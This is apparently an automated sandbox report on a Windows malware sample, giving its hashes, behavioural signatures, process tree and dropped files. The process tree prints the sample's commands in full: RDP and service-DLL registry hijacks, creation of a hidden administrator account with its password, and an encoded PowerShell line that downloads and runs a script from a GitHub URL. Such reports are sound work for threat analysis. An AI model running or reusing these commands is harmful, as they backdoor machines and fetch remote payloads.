Analysis
-
max time kernel
40s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 06:53
General
-
Target
SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
-
Size
4.6MB
-
MD5
d6f9cf363d1cdbf8c076f9198e19df01
-
SHA1
b70fe14eef9aa33bd33068514e192f259802c5f1
-
SHA256
6f7c097945c1602bbae27e4664004cf2139e66226f54b9499df311bdab804ebb
-
SHA512
373962c1533835c6b490310a3a7ae99d6cca22359017499dc9c607a2a06c373a34b55d2ac472c85596f76ac233e87f530ff21cd2b80b916554fbbf6fb7cee1a7
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84D5.tmp" "c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87C3.tmp" "c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe2⤵
-
C:\Windows\system32\timeout.exetimeout -n t3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc jODpYwzb /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc jODpYwzb /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc jODpYwzb /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc jODpYwzb1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc jODpYwzb2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc jODpYwzb3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
0f49574acd4f54227055d966b15fffc0
SHA16c4559636c5735ed5c4d8ad033b8bf65985fc1fb
SHA256562ad9b139d5772493df4dad3a80c63c5b30075520b3f9d71ba45be6c7870a4b
SHA512ea70444ee71f48d6bac93226e91c97c3f8223d4a3ad283f7cf54f389983624bb14b7b7f60faf788716b8acc5be96e26951355f65ad3a9b23841f797a6dd2dbc2
-
C:\Users\Admin\AppData\Local\Temp\RES84D5.tmpMD5
cfe544b5b87e214a2c41395e165a220e
SHA1f8a91380023342ae84d2a8aeedf8ff97e566d668
SHA256a6563dba05c41f0d02e8cea5d56ed247954ec71ac8bc0fd8d99ce434725fb310
SHA512b1108c89dfa8bd2584a0ed3807b11758191a9af5934fd7569178c12b26936038c7903f1b7c32bdbdf55e000b0c9fa0ff99dfd70a4152915dd682fda108d61f77
-
C:\Users\Admin\AppData\Local\Temp\RES87C3.tmpMD5
40c3d22fed240f12ce06e914810f0501
SHA1f4eced5a6100d67c54717692dc4b30b811fe3952
SHA25670248a186a8f0a7098860ba76e965ac57811bbaea169449bd54226a13faf1064
SHA512af15a0c0be2aedebbaa8667448abdb85fe39b97814342383557c175cf3b24a7af6da67f9dc0bc42eda38b058e88fc297ef4582d7d96c5ade8ad6ec61862d5207
-
C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.dllMD5
2fc8166fbe209032e00f78e29a8adcf9
SHA14b0f73cbf7ce31d709abee2006317c6aa8fe9597
SHA2566311e4c23e7ad6fb28eb1e94d3e6104f761ae35b30b7fbd0ebc44a6940791ee4
SHA512359a1e0f9fe1c71230075f2d52b82e36b69978675c05230c1347df253db5914815b77ca3cc7bb0b2bae134f1f61abdb2899e497dbfe3963f17f309ac3fb80be9
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.dllMD5
19eba50c43c59f9c2c3903396d881558
SHA14450609c36d991061b9ecfe4905535c1429bdfd8
SHA2567adbd62789e6e22b6c48ca179db6f3fb5a1dc3d427cc4b7bf88e181804315cac
SHA5120410fd4b64b8b36588c84323811e1b36f6ccbfaafcf612940f7634956ec440e4a32af75479adbad0c36d090df4e22b82c917620f2b7017d605e1337906d745c5
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMPMD5
4254059f4973b50684414a2bda46be55
SHA1acaf290f7b83b08cc6c8c41788bed67d35e7c276
SHA25671363967ffa06a49433462418a77f870cb295bc01bd555c5ecffd79fd731171d
SHA5128e4b6437fc12a24cb07375c484a18080658eb72b018fad9b1fb2cd4689b386ef49b2038f4b8f692b694ae9a8402ab9485147bf6270e601c9c76d2e941473e6f3
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.0.csMD5
fdff1f264c5f5570a5393659b154cb88
SHA1de254de5e517074a9986b36fec83f921aa9aa497
SHA256ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
SHA512db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdlineMD5
0177062d5d1795c4887e86ebfec0e62e
SHA1446f5951282dba06d39bfca3862c5ee5642c16ec
SHA256da15160a760723bdb6178c39972ddca5896858dab4dbc4466592a1a19000ed04
SHA51247da8edf08e25e6943a94a4367738b0d1e8ee839d201009fff7fed2293b010387f07e26791154d2c06d09d141a1f4f43eab478fe2f7af80d9ee7af7cf02fa087
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMPMD5
ef7a1e47e2050ac0ecc86132672a6ebf
SHA168e0fc03f29b151213016bc78fcaccbb10922bea
SHA256d1672349e9639f246f611d1c30c2ef1cfe21fac0d66a36a527565d6ac2e97019
SHA512f3282f8b94bf9d3ee1dc42d3bf60f3830becf13dc4d226720d40d8a600a61d08fa4eca1fe8e67d40525bf3d4b01a4bc1b9921cc46d62a106b15b1cc767ae1b24
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.0.csMD5
fe552aa471e3747e57ddeff23d6da1fc
SHA116832293206ec339d47940533443f4fb375826fa
SHA25660122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
SHA5128cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdlineMD5
4c763707ff20c22394c152bbc21463de
SHA18270ed773cad155be82616cc785356899a97a0c3
SHA256611d31f459d86cf10734d88452163197280d23652168d5cc95fdc5d797698303
SHA51287dd44ec20f2e2e6754e9ef59d4d1b1a788c044febf5ea015aebc282b3d16757a0983caa3b027bb618dd3b63fcea5edc1e7ecf1f20a49f44ddd3b2a040813442
-
\Windows\Branding\mediasrv.pngMD5
b69939766105d4046be4491143b39330
SHA17ae64736d59fc0a88194e660a517e9d6a767ae71
SHA256136505bce328a92a2cae17917808b38e14566dc8cf2cafc07a082e0b1faeeb83
SHA5121abbce8e75f420b238c24f8465e71d2ab774bee2ab340c125da7a03613f5a88b39c39a5d419a2a95949e8c7eafb58d309a52dd4b33e181f8ab60669e12a667ab
-
\Windows\Branding\mediasvc.pngMD5
7507da4d158eb385afcb6ac8aa8ddc32
SHA1863311e2958e9635799ba60521b6a508f0457118
SHA2560b27dc9deb3071f8ef7bde42f0acec45047055d261f6ad626b16cb90981cecfc
SHA512321265108ebbfd617d8b67d70237b08a13585f2c8b4dafca4695bebb1d6c3aabda3a582434f004441ce5019d356958337eddd590dd8215bcb4376495e5d28f73
-
memory/364-21-0x0000000000000000-mapping.dmp
-
memory/572-88-0x0000000000000000-mapping.dmp
-
memory/796-82-0x0000000000000000-mapping.dmp
-
memory/796-18-0x0000000000000000-mapping.dmp
-
memory/984-68-0x0000000000000000-mapping.dmp
-
memory/1120-83-0x0000000000000000-mapping.dmp
-
memory/1180-63-0x0000000000000000-mapping.dmp
-
memory/1236-27-0x0000000000000000-mapping.dmp
-
memory/1264-85-0x0000000000000000-mapping.dmp
-
memory/1312-30-0x0000000000000000-mapping.dmp
-
memory/1352-71-0x0000000000000000-mapping.dmp
-
memory/1412-84-0x0000000000000000-mapping.dmp
-
memory/1560-86-0x0000000000000000-mapping.dmp
-
memory/1572-87-0x0000000000000000-mapping.dmp
-
memory/1776-90-0x0000000000000000-mapping.dmp
-
memory/1884-43-0x00000157D3496000-0x00000157D3498000-memory.dmpFilesize
8KB
-
memory/1884-38-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/1884-44-0x00000157D3498000-0x00000157D349A000-memory.dmpFilesize
8KB
-
memory/1884-40-0x00000157D3493000-0x00000157D3495000-memory.dmpFilesize
8KB
-
memory/1884-39-0x00000157D3490000-0x00000157D3492000-memory.dmpFilesize
8KB
-
memory/1884-37-0x0000000000000000-mapping.dmp
-
memory/2052-73-0x0000000000000000-mapping.dmp
-
memory/2164-72-0x0000000000000000-mapping.dmp
-
memory/2260-67-0x0000000000000000-mapping.dmp
-
memory/2264-81-0x0000000000000000-mapping.dmp
-
memory/2464-34-0x000001376CDB0000-0x000001376CDB1000-memory.dmpFilesize
4KB
-
memory/2464-14-0x000001376CDF0000-0x000001376CDF1000-memory.dmpFilesize
4KB
-
memory/2464-13-0x0000013752C50000-0x0000013752C52000-memory.dmpFilesize
8KB
-
memory/2464-15-0x0000013752C53000-0x0000013752C55000-memory.dmpFilesize
8KB
-
memory/2464-25-0x000001376CD80000-0x000001376CD81000-memory.dmpFilesize
4KB
-
memory/2464-35-0x000001376D3C0000-0x000001376D3C1000-memory.dmpFilesize
4KB
-
memory/2464-10-0x0000000000000000-mapping.dmp
-
memory/2464-17-0x0000013752C56000-0x0000013752C58000-memory.dmpFilesize
8KB
-
memory/2464-12-0x0000013754650000-0x0000013754651000-memory.dmpFilesize
4KB
-
memory/2464-36-0x000001376D750000-0x000001376D751000-memory.dmpFilesize
4KB
-
memory/2464-60-0x0000013752C58000-0x0000013752C59000-memory.dmpFilesize
4KB
-
memory/2464-11-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/2504-89-0x0000000000000000-mapping.dmp
-
memory/2932-66-0x0000000000000000-mapping.dmp
-
memory/3156-78-0x0000000000000000-mapping.dmp
-
memory/3424-80-0x0000000000000000-mapping.dmp
-
memory/3428-79-0x0000000000000000-mapping.dmp
-
memory/3588-76-0x0000000000000000-mapping.dmp
-
memory/3916-45-0x0000000000000000-mapping.dmp
-
memory/3916-46-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/3916-48-0x00000204DDF60000-0x00000204DDF62000-memory.dmpFilesize
8KB
-
memory/3916-49-0x00000204DDF63000-0x00000204DDF65000-memory.dmpFilesize
8KB
-
memory/3916-51-0x00000204DDF66000-0x00000204DDF68000-memory.dmpFilesize
8KB
-
memory/4040-92-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4040-96-0x000001F3BF873000-0x000001F3BF875000-memory.dmpFilesize
8KB
-
memory/4040-95-0x000001F3BF870000-0x000001F3BF872000-memory.dmpFilesize
8KB
-
memory/4040-91-0x0000000000000000-mapping.dmp
-
memory/4040-99-0x000001F3BF876000-0x000001F3BF878000-memory.dmpFilesize
8KB
-
memory/4040-102-0x000001F3BF878000-0x000001F3BF879000-memory.dmpFilesize
4KB
-
memory/4144-77-0x0000000000000000-mapping.dmp
-
memory/4200-61-0x0000000000000000-mapping.dmp
-
memory/4256-70-0x0000000000000000-mapping.dmp
-
memory/4400-64-0x0000000000000000-mapping.dmp
-
memory/4432-59-0x000002287EBE8000-0x000002287EBEA000-memory.dmpFilesize
8KB
-
memory/4432-52-0x0000000000000000-mapping.dmp
-
memory/4432-58-0x000002287EBE6000-0x000002287EBE8000-memory.dmpFilesize
8KB
-
memory/4432-53-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4432-55-0x000002287EBE0000-0x000002287EBE2000-memory.dmpFilesize
8KB
-
memory/4432-57-0x000002287EBE3000-0x000002287EBE5000-memory.dmpFilesize
8KB
-
memory/4508-100-0x0000000000000000-mapping.dmp
-
memory/4516-97-0x0000000000000000-mapping.dmp
-
memory/4520-98-0x0000000000000000-mapping.dmp
-
memory/4568-65-0x0000000000000000-mapping.dmp
-
memory/4592-101-0x0000000000000000-mapping.dmp
-
memory/4596-69-0x0000000000000000-mapping.dmp
-
memory/4620-62-0x0000000000000000-mapping.dmp
-
memory/4688-2-0x0000000000210000-0x00000000006FA000-memory.dmpFilesize
4.9MB
-
memory/4688-3-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4688-4-0x000001E439400000-0x000001E4396B3000-memory.dmpFilesize
2.7MB
-
memory/4688-6-0x000001E47F310000-0x000001E47F312000-memory.dmpFilesize
8KB
-
memory/4688-8-0x000001E47F315000-0x000001E47F316000-memory.dmpFilesize
4KB
-
memory/4688-9-0x000001E47F316000-0x000001E47F317000-memory.dmpFilesize
4KB
-
memory/4688-7-0x000001E47F313000-0x000001E47F315000-memory.dmpFilesize
8KB
